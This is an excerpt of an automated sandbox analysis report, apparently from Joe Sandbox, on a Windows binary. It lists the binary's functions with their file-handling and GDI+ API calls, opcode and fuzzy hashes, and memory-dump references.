                                                              • Opcode ID: f398cdedd11e3140b38d0353d400a138dbf455d98e3a37cfacd6e369cbb2bcc4
                                                              • Instruction ID: 02e524a9ca240a3acebc86e8dd462022427a1467777120314ffa1e06916f5bf9
                                                              • Opcode Fuzzy Hash: f398cdedd11e3140b38d0353d400a138dbf455d98e3a37cfacd6e369cbb2bcc4
                                                              • Instruction Fuzzy Hash: B0111470D10209EBCF04DFA8D985AEEBBB8BF48310F14402AF800E7260DB349A55CF65
                                                              Function 0099EC63 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099EC6A
                                                              • DeleteFileW.KERNELBASE(?,00000024,0099D6F7,?), ref: 0099EC7D
                                                              • DeleteFileW.KERNEL32(00000000,?,00000000), ref: 0099ECBD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile$H_prolog3_
                                                              • String ID:
                                                              • API String ID: 3558260747-0
                                                              • Opcode ID: 3d5152d618d8f92789e1c6ea09a6692352c1f4a188cb9d5d308dd3f3e901d8e6
                                                              • Instruction ID: 56f3a0732e093992b90f32bd334c564e347d591510b9c40352d9c9abcbb4c5c2
                                                              • Opcode Fuzzy Hash: 3d5152d618d8f92789e1c6ea09a6692352c1f4a188cb9d5d308dd3f3e901d8e6
                                                              • Instruction Fuzzy Hash: BF110775D10219DBDF04DFA8D989EDEB7B8BF48311F18442AE444F7251DB34A984CB64
                                                              Function 0099ED1F Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099ED26
                                                              • GetFileAttributesW.KERNELBASE(?,00000024,0099ED16,00000000,0099A4A1,1AC349C0,?,0099CDDD,?,?,?,?,?,?,?,?), ref: 0099ED39
                                                              • GetFileAttributesW.KERNELBASE(?,?,?), ref: 0099ED79
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$H_prolog3_
                                                              • String ID:
                                                              • API String ID: 2559025557-0
                                                              • Opcode ID: 9d0ab7b16cac26ffb8718cb314092dfc396d5f883e76ed4a77644b76b15d3f50
                                                              • Instruction ID: 1975ffae508d4f2094aceb9e7581917ec4cfb217e7e081ab43b1b1962b35014a
                                                              • Opcode Fuzzy Hash: 9d0ab7b16cac26ffb8718cb314092dfc396d5f883e76ed4a77644b76b15d3f50
                                                              • Instruction Fuzzy Hash: 42111675E10218DBCF04DFA8D989AEDBBF9BF49320F18042AE504F7290DB309A448B65
                                                              Function 0099E3D5 Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,0099E3B1,?,?,00000000,?,?,0099CC21,?), ref: 0099E55F
                                                              • GetLastError.KERNEL32 ref: 0099E56E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 8bf42a0bd6920e0f001520969bb80414a15cc730115b96d9f9802a1229128217
                                                              • Instruction ID: 10c64338de90e3fc8a1aaca091a04e5634f7b043d412726eae65ccdca6268e3a
                                                              • Opcode Fuzzy Hash: 8bf42a0bd6920e0f001520969bb80414a15cc730115b96d9f9802a1229128217
                                                              • Instruction Fuzzy Hash: 5B412871604345CBDF24EF2CD984AAEB7E9FF88720F14491DE84583261E774DC818BA2
                                                              Function 0099E772 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?), ref: 0099E78C
                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 0099E840
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: File$BuffersFlushTime
                                                              • String ID:
                                                              • API String ID: 1392018926-0
                                                              • Opcode ID: a9abfd23e33a3cae0281285d93f2ac05110d6a789722c030142856a8a8a4c243
                                                              • Instruction ID: fd8ceb44bb22b5be6cde5dcc0d51543b563818362ad7e48049dac3d769a02819
                                                              • Opcode Fuzzy Hash: a9abfd23e33a3cae0281285d93f2ac05110d6a789722c030142856a8a8a4c243
                                                              • Instruction Fuzzy Hash: 5A21E135259281EBCB14DEA8C891AABBFECAF95304F08491DF4C583141D329E90DD762
                                                              Function 009AFB4B Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009AFB52
                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,009E535C), ref: 009AFC24
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: FileH_prolog3_Operation_wcslen
                                                              • String ID:
                                                              • API String ID: 3104323202-0
                                                              • Opcode ID: 0657e3a612447227ccaa45efb873c5c39cc2db925e0df3fec65bada6f6cd9e21
                                                              • Instruction ID: 82124a41a806759e0725a13ad3a76ce23e87e2e88ea8d4bce8019991b4ee28af
                                                              • Opcode Fuzzy Hash: 0657e3a612447227ccaa45efb873c5c39cc2db925e0df3fec65bada6f6cd9e21
                                                              • Instruction Fuzzy Hash: C5312371D00248DEDF15EFE9C996BDCBBB4BF49364F54012EE019AB192DB700A45CB60
                                                              Function 0099E850 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0099E897
                                                              • GetLastError.KERNEL32 ref: 0099E8A4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 60af5dbfdaadb341f6cd86256b36b4ce7108296a33a430e89f99cde2f04a6576
                                                              • Instruction ID: 4f96e0c8528d1abca80639ae687ec2af46cbadb008cf0a2dc23b93baa68e3c4c
                                                              • Opcode Fuzzy Hash: 60af5dbfdaadb341f6cd86256b36b4ce7108296a33a430e89f99cde2f04a6576
                                                              • Instruction Fuzzy Hash: 6911E130A00710ABEF34D6AEC840BA6B7EDAB45361F644B29E062929D0D7B0FD45D764
                                                              Function 009B3C78 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 009B3C82
                                                              • _wcslen.LIBCMT ref: 009B3C99
                                                                • Part of subcall function 009A6A89: _wcslen.LIBCMT ref: 009A6AA6
                                                                • Part of subcall function 0099B03D: __EH_prolog3_GS.LIBCMT ref: 0099B044
                                                                • Part of subcall function 0099B3E1: __EH_prolog3_GS.LIBCMT ref: 0099B3E8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3__wcslen$H_prolog3_catch_
                                                              • String ID:
                                                              • API String ID: 1265872803-0
                                                              • Opcode ID: 3a1af482b0650668cac160a918fdb39b2512b81e3d148576021664ff3130d40f
                                                              • Instruction ID: 6985d4b6dd112ea3a47bb582a78dab0fc92ae26e5ea441d9957d286dc50834ae
                                                              • Opcode Fuzzy Hash: 3a1af482b0650668cac160a918fdb39b2512b81e3d148576021664ff3130d40f
                                                              • Instruction Fuzzy Hash: 96110C319196D0AECB11EB68AD91BDC7BF4AB55318F06419EE4449F253CB704E40D7A2
                                                              Function 00991CE2 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 00991CE9
                                                              • GetDlgItem.USER32(?,?), ref: 00991D01
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_Item_wcslen
                                                              • String ID:
                                                              • API String ID: 896027972-0
                                                              • Opcode ID: 5715adad90ca5a251890b89885cd9154dbc415c8f5346985de638cc36ee67cab
                                                              • Instruction ID: 6b239b013b14aee55594093d43e940082717f2c3cd0cb2b13fa8bc9354e73002
                                                              • Opcode Fuzzy Hash: 5715adad90ca5a251890b89885cd9154dbc415c8f5346985de638cc36ee67cab
                                                              • Instruction Fuzzy Hash: FC017171A012059EDB24AFACC986BEDB7ECBF98350F40050AF816A71D1CB709A41C711
                                                              Function 009A76A7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,009A76EA,009A0B6F), ref: 009A76B4
                                                              • GetProcessAffinityMask.KERNEL32(00000000,?,009A76EA), ref: 009A76BB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Process$AffinityCurrentMask
                                                              • String ID:
                                                              • API String ID: 1231390398-0
                                                              • Opcode ID: d897c9c180c4ef4456c4b2af5b7f0502b43fb6843e0b259730a06095c067b0e9
                                                              • Instruction ID: 0ade487c6b8fb0caf978953d40c67ff609bc6e0b94ab56ca61815bd5152e45b0
                                                              • Opcode Fuzzy Hash: d897c9c180c4ef4456c4b2af5b7f0502b43fb6843e0b259730a06095c067b0e9
                                                              • Instruction Fuzzy Hash: 02E0D873F24906A7CF19C7ED9C06AEBB6DDEA452483184079E413D3100F974DD0156E1
                                                              Function 009AF53A Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,009C9B73,000000FF), ref: 009AF578
                                                              • CoUninitialize.COMBASE(?,?,?,?,009C9B73,000000FF), ref: 009AF57D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: GdiplusShutdownUninitialize
                                                              • String ID:
                                                              • API String ID: 3856339756-0
                                                              • Opcode ID: 616383d7d999441b71b0a12c92b8ae11b51dd34d94cc5db5a07d09e851dd6c60
                                                              • Instruction ID: 9573be20c2ecd3c9615ce2e2cdd50a7cc14eede0315533f333578b696bd92c27
                                                              • Opcode Fuzzy Hash: 616383d7d999441b71b0a12c92b8ae11b51dd34d94cc5db5a07d09e851dd6c60
                                                              • Instruction Fuzzy Hash: FCF03A76A18A44AFC7019F59EC45B9ABBA8FB88760F00422AE51693760CB74A800CA90
                                                              Function 009AE849 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 009AE86A
                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 009AE871
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: BitmapCreateFromGdipStream
                                                              • String ID:
                                                              • API String ID: 1918208029-0
                                                              • Opcode ID: bf70a8ebd577afa495264ebf5d031ef947c871c8378c10d3ec39ac1d1d3e467c
                                                              • Instruction ID: c21a801fd6bc30a3e7ebc0c66e7138db6977e4434e8821d2b06eb97addb486ed
                                                              • Opcode Fuzzy Hash: bf70a8ebd577afa495264ebf5d031ef947c871c8378c10d3ec39ac1d1d3e467c
                                                              • Instruction Fuzzy Hash: EAE01271901218EFCB60DF59C905BDDB7F8FB45360F20845AA88593641E674AE04DB91
                                                              Function 00991E1F Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ItemShowWindow
                                                              • String ID:
                                                              • API String ID: 3351165006-0
                                                              • Opcode ID: 90c53506244927580f5b7e6e80e75694a74d3b63edb35e741a5119b787e52c62
                                                              • Instruction ID: 5f6d531449029c48eb481969a295d7729347202c576ea6d314cbee9478b8eb22
                                                              • Opcode Fuzzy Hash: 90c53506244927580f5b7e6e80e75694a74d3b63edb35e741a5119b787e52c62
                                                              • Instruction Fuzzy Hash: 34C0123206C280BECB010BB0DC09D2ABBA8ABA6212F00CA08F0A5C0060C239C810EB12
                                                              Function 00991CC4 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00991CD2
                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00991CD9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherItemUser
                                                              • String ID:
                                                              • API String ID: 4250310104-0
                                                              • Opcode ID: 45524108d6ddc4cd47f3ee47c823d0d02c2714967f20359755cd4e775325e49e
                                                              • Instruction ID: c36097d05380ce8806e3cb443f8f8ba800cb601a6d3681a1c422d183dc1510a8
                                                              • Opcode Fuzzy Hash: 45524108d6ddc4cd47f3ee47c823d0d02c2714967f20359755cd4e775325e49e
                                                              • Instruction Fuzzy Hash: 70C04C7641C380BFCB015BE09D5CC2FFFA9AB95311F00C949F5A584120C6358810EB12
                                                              Function 009927E0 Relevance: 1.8, APIs: 1, Instructions: 306COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 03fda1da1bb05d72a2a6efd087e0f154bcbd3061e4de5a5f4ac4c4e3a1ae3fa5
                                                              • Instruction ID: af6046446f3ed8e84a9386b5da6aa4904429bd62dc0179461709d0d8103827f0
                                                              • Opcode Fuzzy Hash: 03fda1da1bb05d72a2a6efd087e0f154bcbd3061e4de5a5f4ac4c4e3a1ae3fa5
                                                              • Instruction Fuzzy Hash: 02C18C71A04255ABDF25DF6CC994BED7BE8AF4A300F1800B9EC09DF296C7349945CBA1
                                                              Function 009A9556 Relevance: 1.8, APIs: 1, Instructions: 258COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 7ff32931ab3264f02bbed79cfdf5772811d8c12b041156ed22d4e245c77da1ba
                                                              • Instruction ID: 795f1788a05854c642f094703bd89639a6bea0c54ce06c5628cf0b3ca2477b85
                                                              • Opcode Fuzzy Hash: 7ff32931ab3264f02bbed79cfdf5772811d8c12b041156ed22d4e245c77da1ba
                                                              • Instruction Fuzzy Hash: 308127719043158FDB24EF68C985BAEB7E8FF82314F04092EF85597281EBB499448BE1
                                                              Function 009920B0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 009920B7
                                                                • Part of subcall function 009980EC: __EH_prolog3.LIBCMT ref: 009980F3
                                                                • Part of subcall function 009A2815: __EH_prolog3.LIBCMT ref: 009A281C
                                                                • Part of subcall function 009976E7: __EH_prolog3.LIBCMT ref: 009976EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 3a05539650240c0856368c0a8881087e343aeeef360e1a172bad80f8e63ed397
                                                              • Instruction ID: 1dea426e57dd62fb91842eca04213451efdd34aa6c4cb4a588d28eca6b306e0a
                                                              • Opcode Fuzzy Hash: 3a05539650240c0856368c0a8881087e343aeeef360e1a172bad80f8e63ed397
                                                              • Instruction Fuzzy Hash: 0851F6B5A097808EDB44DF6985807C9BBE0AF99300F0885BEDC5DCF69BDB740255CB61
                                                              Function 0099B3E1 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099B3E8
                                                                • Part of subcall function 0099F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,0099A684,?,?,00000000,?,?,?,?,?,?), ref: 0099F739
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CloseFindH_prolog3_
                                                              • String ID:
                                                              • API String ID: 2672038326-0
                                                              • Opcode ID: 9941ca52761c012df3ae81e7aa230c006c3b165b272bf8d08d9b5a87e42d0971
